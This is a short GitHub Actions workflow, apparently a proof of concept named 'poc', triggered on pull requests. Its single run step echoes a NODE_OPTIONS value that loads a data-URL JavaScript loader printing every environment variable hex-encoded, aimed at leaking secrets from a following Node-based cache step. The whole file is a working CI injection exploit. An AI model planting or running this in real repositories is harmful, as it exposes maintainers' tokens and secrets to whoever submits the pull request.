name: poc
on: pull_request
jobs:
  a-job:
   runs-on: ubuntu-latest
   steps:
    - run: echo -e "11\nNODE_OPTIONS=--experimental-modules --experimental-loader=data:text/javascript,console.log(Buffer.from(JSON.stringify(process.env)).toString( 'hex' ));//"
    - uses: actions/cache@v2
      with:
       name: pr
       path: ./NR
